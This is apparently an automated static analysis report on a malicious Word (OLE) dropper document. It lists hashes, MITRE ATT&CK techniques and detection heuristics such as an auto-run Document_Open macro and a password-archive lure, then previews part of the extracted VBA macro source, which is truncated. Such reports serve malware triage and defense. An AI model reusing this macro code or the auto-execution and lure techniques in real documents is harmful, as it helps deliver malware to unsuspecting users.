Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 767610cc4ca2519b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 111.5 KB
Created: 2020-01-09 16:57:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: 18787488bc29dcefccba2ac333a4f2fa
SHA-1: dda581029541fa734e2c0c065fdfe2f59d2695fd
SHA-256: 767610cc4ca2519b82ddfa961c544396b74bf37ce10028d113ac7dae3efc0811
Risk score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, including a Document_Open macro that calls CreateObject, indicating it is designed to execute code as soon as the document is opened. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic suggests the document may instruct the user to disable security features or supply a password to open an archive, a common tactic for keeping a payload encrypted until it has passed gateway scanning. The ClamAV detection 'Doc.Dropper.Agent-9612922-0' further supports classifying the file as a dropper.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-9612922-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-9612922-0
  • Password-protected archive handoff [high] (SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 50824 bytes
SHA-256: 423fbef0ee6c96cfee132f965c36403c5a25593a10ed0d0c9a66ce88157ab5b4
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blobs)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const CP_UTF8                       As Long = 65001

#If Win64 Then
Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As LongPtr
Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr) As Long
#Else
Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As Long, ByVal lpUsedDefaultChar As Long) As Long
Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long) As Long

#End If
 

 
 Dim Defrolo As Variant
 Dim flon As Variant
 
Sub loadBancos()

    '' SERVER
    With banco(0)
        .strSource = Sheets("BANCOS").Range("C2")
        .strDriver = Sheets("BANCOS").Range("C3")
        .strLocation = Sheets("BANCOS").Range("C4")
        .strDatabase = Sheets("BANCOS").Range("C5")
        .strUser = Sheets("BANCOS").Range("C6")
        .strPassword = Sheets("BANCOS").Range("C7")
        .strPort = Sheets("BANCOS").Range("C8")
    End With
    
    '' LOCAL
    With banco(1)
        .strSource = Sheets("BANCOS").Range("F2")
        .strDriver = Sheets("BANCOS").Range("F3")
        .strLocation = Sheets("BANCOS").Range("F4")
        .strDatabase = Sheets("BANCOS").Range("F5")
        .strUser = Sheets("BANCOS").Range("F6")
        .strPassword = Sheets("BANCOS").Range("F7")
        .strPort = Sheets("BANCOS").Range("F8")
    End With

End Sub

Sub loadOrcamento(strVendedor As String, strControle As String, Optional strOperator As String, Optional strStatus As String)

    With Orcamento
        .strVendedor = strVendedor
        .strControle = strControle
        .strOperator = strOperator
        .strStatus = strStatus
    End With

End Sub

Function Transferencia(strOperacao As String, strDepartamento As String, strOrcamento As String, strLocal As String, strServer As String)
Dim Connection As New ADODB.Connection
Dim rstSincronismo As ADODB.Recordset
Set rstSincronismo = New ADODB.Recordset
Dim strSql As String

''Is Internet Connected
If IsInternetConnected() = True Then
    Set Connection = OpenConnection(strLocal)
    '' Is Connected
    If Connection.State = 1 Then
        strSql = "SELECT DISTINCT tabela FROM qrySincronismo where sincronismo = '" & strOperacao & "' and dpto = '" & strDepartamento & "'"
        Call rstSincronismo.Open(strSql, Connection, adOpenStatic, adLockOptimistic)
        '' SEND/RECEIVE DATA
        Do While Not rstSincronismo.EOF
            strSql = "SELECT * FROM " & rstSincronismo.Fields("tabela") & " WHERE controle = '" & strOrcamento.strControle & "' AND vendedor = '" & strOrcamento.strVendedor & "'"
            EnvioDeDados strLocal, strServer, strSql
            
            If strOperacao = "ENVIAR" Then
                '' server ( ENVIAR )
                loadOrcamento strOrcamento.strVendedor, strOrcamento.strControle
                loadOrcamento strOrcamento.strVendedor, strOrcamento.strControle, strStatus:=ID_STATUS(banco(1), Orcamento)
                Call admOrcamentoAtualizarEtapaADO(banco(0), Orcamento)
            ElseIf strOperacao = "RECEBER" Then
   
... (truncated)